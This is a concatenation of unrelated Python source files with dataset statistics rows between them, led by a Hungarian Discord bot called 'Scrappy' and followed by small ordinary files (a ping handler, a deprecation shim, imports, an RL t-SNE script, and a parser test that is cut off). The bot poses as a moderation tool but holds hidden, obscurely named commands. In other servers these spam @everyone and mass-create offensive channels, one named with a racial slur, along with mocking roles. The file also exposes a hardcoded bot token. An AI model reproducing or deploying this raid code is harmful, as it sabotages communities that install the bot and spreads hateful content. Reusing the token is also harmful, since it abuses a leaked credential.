await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
else:
if not ctx.guild.name == "Scrappy | OFFICIAL":
embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@bot.command(pass_context=True)
async def huhegb7777(ctx):
await ctx.message.delete()
guild = ctx.message.guild
if not ctx.guild.name == "Scrappy | OFFICIAL":
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
else:
embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@bot.command(pass_context = True)
async def rnumber(ctx):
embed=discord.Embed(title="Scrappy | srnumber", description="A Rendszer Generál Egy Számot 1 és 1000 Között", color=discord.Colour.green())
embed.add_field(name="Szám", value=(random.randint(1,1000)), inline=False)
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command(pass_context=True)
async def gjuvhd999999(ctx):
await ctx.message.delete()
if not ctx.guild.name == "Scrappy | OFFICIAL":
guild = ctx.guild
await guild.create_role(name="beszoptad :C")
await guild.create_role(name="cumi :C")
else:
embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@bot.command()
@commands.has_permissions(administrator=True)
async def kick(ctx, member:discord.Member = None):
await ctx.message.delete()
if not member:
embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
await member.kick()
embed=discord.Embed(title="Scrappy | skick", description="✅ Az említett játékos kilett dobva a szerverről", color=discord.Colour.green())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@kick.error
async def kick_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( skick )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def ban(ctx, member:discord.Member = None):
await ctx.message.delete()
if not member:
embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
await member.ban()
embed=discord.Embed(title="Scrappy | sban", description="✅ Az említett játékos kilett tiltva a szerverről", color=discord.Colour.green())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@ban.error
async def ban_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sban )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def mute(ctx, member: discord.Member=None):
await ctx.message.delete()
if not member:
embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
await member.add_roles(role)
@mute.error
async def mute_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( smute )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def unmute(ctx, member: discord.Member=None):
await ctx.message.delete()
if not member:
embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
await member.remove_roles(role)
@bot.command()
@commands.has_permissions(administrator=True)
async def warn(ctx, member: discord.Member=None):
await ctx.message.delete()
username = ctx.message.author.name
if not member:
embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
role = discord.utils.get(ctx.guild.roles, name="Figyelmeztettett")
await member.add_roles(role)
embed=discord.Embed(title="Scrappy | swarn", description="Sikeres Müvelet", color=discord.Colour.red())
embed.add_field(name="Felhasználó:", value=(member))
embed.add_field(name="Figyelmeztette:", value=(username))
embed.add_field(name="Büntetés:", value='Figyelmeztetett Rang')
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@warn.error
async def warn_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( swarn )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@unmute.error
async def unmute_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sunmute )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(send_messages=True)
async def broadcast(ctx, arg):
await ctx.message.delete()
embed = discord.Embed(title="Scrappy | Üzenet", description='▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬', color=discord.Colour.blue())
embed.add_field(name="Üzenet:", value=(arg))
embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def setup(ctx, arg):
await ctx.message.delete()
await guild.create_role(name="Figyelmeztettett", color=discord.Colour.red())
@setup.error
async def setup_error(ctx, error):
await ctx.message.delete()
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ A Bot Feltelepitéséhez Adminisztrációs Jog Szükséges!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
async def help(ctx):
await ctx.message.delete()
embed = discord.Embed(title="Scrappy | shelp", description="Jelenleg elérhető parancsok:", color=discord.Colour.blue())
embed.add_field(name="Bot Feltelepitése:", value="ssetup", inline=False)
embed.add_field(name="A Bot Prefixe:", value="s", inline=False)
embed.add_field(name="Alap Parancsok:", value="info, help, broadcast <Üzenet>, clear <mennyiség>", inline=False)
embed.add_field(name="Fun Parancsok:", value="srnumber,", inline=False)
embed.add_field(name="Zene Parancsok:", value="Hamarosan", inline=False)
embed.add_field(name="Moderációs Parancsok:", value="ban, kick, warn, mute, unmute", inline=False)
embed.add_field(name="WARN:", value="Feltelepitésnél Scrappy Létrehoz egy ( Figyelmeztettett ) Rangot, Ezt a rangot tetszőlegesen állithatod be, akár egy két jog elvonásával ( ugye ezzel adva értelmet a rangnak )", inline=False)
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(manage_messages=True)
async def clear(ctx, amount=100):
await ctx.message.delete()
channel = ctx.message.channel
messages = []
async for message in channel.history(limit=amount):
messages.append(message)
await channel.delete_messages(messages)
embed = discord.Embed(title="Scrappy | sclear", description=" ✅ Üzenetek törölve.", color=discord.Colour.green())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@clear.error
async def clear_error(ctx, error):
if isinstance(error, commands.CheckFailure):
embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sclear )", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
@bot.command()
async def info(ctx):
await ctx.message.delete()
embed = discord.Embed(title="Scrappy | sinfo", description="[📌] Információk", color=discord.Colour.green())
embed.add_field(name="Készitő:", value="Getdown")
embed.add_field(name="Készités Dátuma:", value="2020.03.16")
embed.add_field(name="Programnyelv:", value="Python")
embed.add_field(name="Szerverek", value=f"{len(bot.guilds)}")
embed.add_field(name="Elérhetőség", value="GETDOWN#5271")
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
bot.run ("Njg5NDY1MjEwNTgyNTk3NzAx.XnMxgw.szJh3vby9mJYi0Q41syFq6Iiuo8")
| 49.977716 | 232 | 0.669045 | 4,220 | 35,884 | 5.584834 | 0.061848 | 0.09131 | 0.129837 | 0.187033 | 0.903938 | 0.888111 | 0.873345 | 0.866896 | 0.860192 | 0.851663 | 0 | 0.003244 | 0.201009 | 35,884 | 717 | 233 | 50.04742 | 0.817097 | 0 | 0 | 0.841079 | 0 | 0.001499 | 0.337309 | 0.001644 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005997 | 0.034483 | 0 | 0.047976 | 0.001499 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
063aae7cb1db88f3749863383285d03015337c18 | 82 | py | Python | app/http/v1/handlers/default.py | nkthanh98/flask-openapi | cc6842096166d4d3cedf73a38caf5b8cc521e813 | [
"MIT"
] | 1 | 2020-04-20T07:19:35.000Z | 2020-04-20T07:19:35.000Z | app/http/v1/handlers/default.py | nkthanh98/flask-webservice | cc6842096166d4d3cedf73a38caf5b8cc521e813 | [
"MIT"
] | 9 | 2020-04-12T03:27:24.000Z | 2020-04-16T15:16:16.000Z | app/http/v1/handlers/default.py | nkthanh98/flask-openapi | cc6842096166d4d3cedf73a38caf5b8cc521e813 | [
"MIT"
] | null | null | null | # coding=utf-8
from connexion import NoContent
def ping():
return NoContent
| 11.714286 | 31 | 0.731707 | 11 | 82 | 5.454545 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015152 | 0.195122 | 82 | 6 | 32 | 13.666667 | 0.893939 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
0668bababa6090c4f04e99198c05d9f352b29060 | 258 | py | Python | pytorch_lightning/utilities/warning_utils.py | KyleGoyette/pytorch-lightning | d6470bf1937e51e037a7f94a55ad76898e5ae103 | [
"Apache-2.0"
] | 3 | 2021-04-09T14:03:03.000Z | 2021-04-10T02:58:23.000Z | pytorch_lightning/utilities/warning_utils.py | KyleGoyette/pytorch-lightning | d6470bf1937e51e037a7f94a55ad76898e5ae103 | [
"Apache-2.0"
] | 1 | 2021-03-26T02:16:20.000Z | 2021-03-26T02:16:20.000Z | pytorch_lightning/utilities/warning_utils.py | KyleGoyette/pytorch-lightning | d6470bf1937e51e037a7f94a55ad76898e5ae103 | [
"Apache-2.0"
] | 1 | 2021-09-16T15:14:11.000Z | 2021-09-16T15:14:11.000Z | from pytorch_lightning.utilities import rank_zero_deprecation
rank_zero_deprecation("`warning_utils` package has been renamed to `warnings` since v1.2 and will be removed in v1.4")
from pytorch_lightning.utilities.warnings import * # noqa: F403 E402 F401
| 43 | 118 | 0.817829 | 39 | 258 | 5.230769 | 0.74359 | 0.107843 | 0.196078 | 0.284314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057269 | 0.120155 | 258 | 5 | 119 | 51.6 | 0.84141 | 0.077519 | 0 | 0 | 0 | 0.333333 | 0.394068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0676049c597ba2f78f4a3e6585d5afcf3a1e8631 | 150 | py | Python | image_similarity/__init__.py | JonathanSum/image_similarity | 3215f5932f11f1c7c52f87bda99745be24b03632 | [
"MIT"
] | 160 | 2020-08-23T18:49:29.000Z | 2022-03-27T02:56:41.000Z | image_similarity/__init__.py | JonathanSum/image_similarity | 3215f5932f11f1c7c52f87bda99745be24b03632 | [
"MIT"
] | 5 | 2020-09-03T13:19:01.000Z | 2022-01-24T08:45:43.000Z | image_similarity/__init__.py | JonathanSum/image_similarity | 3215f5932f11f1c7c52f87bda99745be24b03632 | [
"MIT"
] | 37 | 2020-08-25T08:19:48.000Z | 2022-03-11T06:48:39.000Z | from torch_engine import *
from torch_model import *
from torch_data import *
from torch_train import *
from torch_infer import *
from utils import *
| 21.428571 | 26 | 0.8 | 23 | 150 | 5 | 0.391304 | 0.391304 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 150 | 6 | 27 | 25 | 0.912698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
06b0480d25716925ebb830052f7c3ee9937dda39 | 1,535 | py | Python | experiment_scripts/1-16-2021/tsne.py | alexlioralexli/TD3 | 2a9258c822f03b1334295acf9fbeb8170d213684 | [
"MIT"
] | null | null | null | experiment_scripts/1-16-2021/tsne.py | alexlioralexli/TD3 | 2a9258c822f03b1334295acf9fbeb8170d213684 | [
"MIT"
] | null | null | null | experiment_scripts/1-16-2021/tsne.py | alexlioralexli/TD3 | 2a9258c822f03b1334295acf9fbeb8170d213684 | [
"MIT"
] | null | null | null | envs = ['Ant-v3', 'HalfCheetah-v3', 'Hopper-v2', 'Walker2d-v2']
env_folders = [['/home/pathak-visitor1/workspace/TD3/logs/Ant-v3-td3-01-14-2021/Ant-v3-td3-FourierMLP-exp16-01-14-2021_18-21-19-563065',
'/home/pathak-visitor1/workspace/TD3/logs/Ant-v3-td3-01-14-2021/Ant-v3-td3-MLP-exp16-01-14-2021_18-20-58-515211'],
['/home/pathak-visitor1/workspace/TD3/logs/HalfCheetah-v3-td3-01-14-2021/HalfCheetah-v3-td3-FourierMLP-exp16-01-14-2021_18-21-19-959718',
'/home/pathak-visitor1/workspace/TD3/logs/HalfCheetah-v3-td3-01-14-2021/HalfCheetah-v3-td3-MLP-exp16-01-14-2021_18-20-58-517651'],
['/home/pathak-visitor1/workspace/TD3/logs/Hopper-v2-td3-01-14-2021/Hopper-v2-td3-FourierMLP-exp16-01-14-2021_18-21-19-915820',
'/home/pathak-visitor1/workspace/TD3/logs/Hopper-v2-td3-01-14-2021/Hopper-v2-td3-MLP-exp16-01-14-2021_18-20-58-889674'],
['/home/pathak-visitor1/workspace/TD3/logs/Walker2d-v2-td3-01-14-2021/Walker2d-v2-td3-FourierMLP-exp16-01-14-2021_18-21-19-565278',
'/home/pathak-visitor1/workspace/TD3/logs/Walker2d-v2-td3-01-14-2021/Walker2d-v2-td3-MLP-exp16-01-14-2021_18-20-58-732887']]
files = ['itr250000', 'final']
expl_noises = [0, 0.1]
for i, env in enumerate(envs):
for folder in env_folders[i]:
for file in files:
for expl_noise in expl_noises:
print(f'python make_state_tsne.py --env {env} --n_timesteps 25000 --expl_noise {expl_noise} --load_model {folder + "/" + file}') | 85.277778 | 152 | 0.682736 | 253 | 1,535 | 4.067194 | 0.237154 | 0.062196 | 0.124393 | 0.209913 | 0.71137 | 0.71137 | 0.71137 | 0.71137 | 0.71137 | 0.71137 | 0 | 0.233835 | 0.13355 | 1,535 | 18 | 153 | 85.277778 | 0.53985 | 0 | 0 | 0 | 0 | 0.5625 | 0.744792 | 0.632813 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ebf59481ceda056834bf1999ee2f8aa974339c13 | 320 | py | Python | geneticpython/models/tree/__init__.py | ngocjr7/geneticpython | 4b4157523ce13b3da56cef61282cb0a984cd317b | [
"MIT"
] | null | null | null | geneticpython/models/tree/__init__.py | ngocjr7/geneticpython | 4b4157523ce13b3da56cef61282cb0a984cd317b | [
"MIT"
] | null | null | null | geneticpython/models/tree/__init__.py | ngocjr7/geneticpython | 4b4157523ce13b3da56cef61282cb0a984cd317b | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from geneticpython.models.tree.network_random_keys import NetworkRandomKeys
from geneticpython.models.tree.prufer_code import PruferCode
from geneticpython.models.tree.edge_sets import EdgeSets
from geneticpython.models.tree.tree import Tree, KruskalTree, LinkCutTree, RootedTree
| 45.714286 | 85 | 0.878125 | 40 | 320 | 6.8 | 0.5 | 0.25 | 0.338235 | 0.397059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 320 | 6 | 86 | 53.333333 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ebfbbc9d89c52fd2ba6bb81d40050f1e233bb805 | 5,758 | py | Python | tests/test_parser.py | rominf/cleo | 72f6a8a19f26eefc32c3fcf9844484fc9a38583f | [
"MIT"
] | null | null | null | tests/test_parser.py | rominf/cleo | 72f6a8a19f26eefc32c3fcf9844484fc9a38583f | [
"MIT"
] | null | null | null | tests/test_parser.py | rominf/cleo | 72f6a8a19f26eefc32c3fcf9844484fc9a38583f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from cleo.parser import Parser
from cleo.validators import Integer, Boolean
from . import CleoTestCase
class ParserTestCase(CleoTestCase):
def test_basic_parameter_parsing(self):
results = Parser.parse('command:name')
self.assertEqual('command:name', results['name'])
results = Parser.parse('command:name {argument} {--option}')
self.assertEqual('command:name', results['name'])
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertEqual('option', results['options'][0].get_name())
self.assertFalse(results['options'][0].accept_value())
results = Parser.parse('command:name {argument*} {--option=}')
self.assertEqual('command:name', results['name'])
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertTrue(results['arguments'][0].is_list())
self.assertTrue(results['arguments'][0].is_required())
self.assertEqual('option', results['options'][0].get_name())
self.assertTrue(results['options'][0].accept_value())
results = Parser.parse('command:name {argument?*} {--option=*}')
self.assertEqual('command:name', results['name'])
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertTrue(results['arguments'][0].is_list())
self.assertFalse(results['arguments'][0].is_required())
self.assertEqual('option', results['options'][0].get_name())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
results = Parser.parse('command:name {argument?* : The argument description.} {--option=* : The option description.}')
self.assertEqual('command:name', results['name'])
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertEqual('The argument description.', results['arguments'][0].get_description())
self.assertTrue(results['arguments'][0].is_list())
self.assertFalse(results['arguments'][0].is_required())
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('The option description.', results['options'][0].get_description())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
results = Parser.parse(
